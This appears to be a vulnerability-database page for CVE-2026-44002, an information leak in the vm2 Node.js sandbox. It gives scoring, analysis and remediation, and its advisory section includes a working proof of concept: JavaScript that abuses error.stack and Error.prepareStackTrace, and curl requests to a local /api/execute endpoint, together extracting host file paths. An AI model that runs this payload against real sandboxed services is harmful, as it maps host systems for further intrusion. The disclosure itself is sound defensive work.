Skip to main content

vm2 CVE-2026-44002

MEDIUM
Error Message Information Leak (CWE-209)
2026-05-07 https://github.com/patriksimek/vm2 GHSA-v27g-jcqj-v8rw
5.8
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
5.8 MEDIUM
AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
Red Hat
5.8 MEDIUM
qualitative

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
None
Availability
None

Lifecycle Timeline

3
Source Code Evidence Fetched
May 07, 2026 - 05:00 vuln.today
Analysis Generated
May 07, 2026 - 05:00 vuln.today
CVE Published
May 07, 2026 - 04:30 nvd
MEDIUM 5.8

DescriptionGitHub Advisory

Summary

vm2's CallSite wrapper class (intended as a safe wrapper for V8's native CallSite) blocks getThis() and getFunction() to prevent host object leakage, but allows getFileName() to return unsanitized host absolute paths. Any sandboxed code can extract the full directory structure, library paths, and framework versions of the host server.

Details

In lib/setup-sandbox.js:436-466, the CallSite class overrides getThis() and getFunction() with undefined to prevent host object references from leaking into the sandbox. However, the following methods pass through unsanitized values from the original V8 CallSite object:

  • getFileName() - returns host absolute paths like /app/node_modules/vm2/lib/vm.js
  • getLineNumber(), getColumnNumber() - exact source locations
  • getFunctionName(), getMethodName(), getTypeName() - internal function names

Two exploitation paths exist:

  1. Default error.stack: new Error().stack includes host frame paths in the formatted string
  2. Custom prepareStackTrace: Attacker can set Error.prepareStackTrace to directly call getFileName() on each CallSite, extracting a clean list of all host paths

PoC

Library-level PoC (Node.js script - primary):

javascript
const { VM } = require("vm2");
const vm = new VM();

// Path A - Default error.stack
const result1 = vm.run(`try { null.x; } catch(e) { e.stack }`);
console.log(result1);
// Output includes: /app/node_modules/vm2/lib/vm.js:289:18
//                   /app/src/server.js:49:20

// Path B - prepareStackTrace extraction
const result2 = vm.run(`
  Error.prepareStackTrace = function(e, sst) {
    return sst.map(function(s) { return s.getFileName(); }).join(", ");
  };
  new Error().stack
`);
console.log(result2);
// Output: vm.js, node:vm, /app/node_modules/vm2/lib/vm.js, /app/src/sandbox.js, ...

HTTP demonstration:

bash
# Default error.stack
curl -s -X POST http://localhost:3000/api/execute \
  -H "Content-Type: application/json" \
  -d '{"code":"try { null.x; } catch(e) { e.stack }"}'
# Result includes host paths: /app/src/server.js, /app/node_modules/express/...
# prepareStackTrace extraction
curl -s -X POST http://localhost:3000/api/execute \
  -H "Content-Type: application/json" \
  -d '{"code":"Error.prepareStackTrace = function(e, sst) { return sst.map(function(s) { return s.getFileName(); }).join(\", \"); }; new Error().stack"}'
# Result: /app/node_modules/vm2/lib/vm.js, /app/src/sandbox.js, /app/src/server.js, ...

Impact

  • Information Disclosure: Host directory structure, library paths, framework versions, and internal architecture are exposed to sandboxed code.
  • Attack Chain: Leaked paths enable precise targeting for other vulnerabilities.
  • Scope: All applications using vm2. No special configuration required.

AnalysisAI

Information disclosure in vm2 allows sandboxed code to extract host absolute file paths, library locations, and internal function names via stack trace inspection, enabling attackers to map the host server's directory structure and architecture without authentication or user interaction. The vulnerability affects all versions up to 3.10.5 and is triggered through either default error.stack formatting or custom Error.prepareStackTrace handlers; vendor-released patch available in version 3.11.0.

Technical ContextAI

vm2 is a Node.js sandbox library that restricts code execution by wrapping host V8 CallSite objects (which represent stack frames). The wrapper class in lib/setup-sandbox.js blocks getThis() and getFunction() to prevent host object leakage, but fails to sanitize getFileName(), getLineNumber(), getColumnNumber(), getFunctionName(), getMethodName(), and getTypeName() methods. These methods return unfiltered host runtime data including absolute filesystem paths. The root cause (CWE-209: Information Exposure Through an Error Message) stems from incomplete sanitization of a security wrapper-the developers blocked direct object reference leakage but left metadata paths unsanitized. CPE pkg:npm/vm2 <= 3.10.5 is affected. Two distinct exploitation paths exist: passive observation of default error.stack formatting which includes host frames, or active manipulation via Error.prepareStackTrace to directly enumerate all host file paths without triggering exceptions.

RemediationAI

Upgrade vm2 to version 3.11.0 or later immediately. The upstream fix sanitizes CallSite wrapper methods to prevent path disclosure while maintaining sandbox isolation. No workarounds are recommended for production environments running untrusted code, as error handling and stack trace inspection are fundamental JavaScript features that cannot be reliably disabled from the sandbox boundary. Organizations unable to upgrade should implement network-level segmentation to restrict outbound connections from sandboxed execution contexts and monitor error logs for suspicious stack trace extraction patterns, though these are compensating controls with significant operational overhead and should not delay patching.

CVE-2024-55591 CRITICAL POC
9.8 Jan 14

FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote

CVE-2014-7205 CRITICAL POC
10.0 Oct 08

Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t

CVE-2025-59528 CRITICAL POC
10.0 Sep 22

Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete

CVE-2017-14849 HIGH POC
7.5 Sep 28

Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc

CVE-2017-5941 CRITICAL POC
9.8 Feb 09

An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner

CVE-2014-3744 HIGH POC
7.5 Oct 23

Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi

CVE-2014-9566 HIGH POC
7.5 Mar 10

Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin

CVE-2013-4660 MEDIUM POC
6.8 Jun 28

The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic

CVE-2015-5688 MEDIUM POC
5.0 Sep 04

Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read

CVE-2026-45321 CRITICAL POC
9.6 May 12

Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio

CVE-2014-7192 CRITICAL POC
10.0 Dec 11

Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat

CVE-2013-4450 MEDIUM POC
5.0 Oct 21

The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se

Vendor StatusVendor

Share

CVE-2026-44002 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy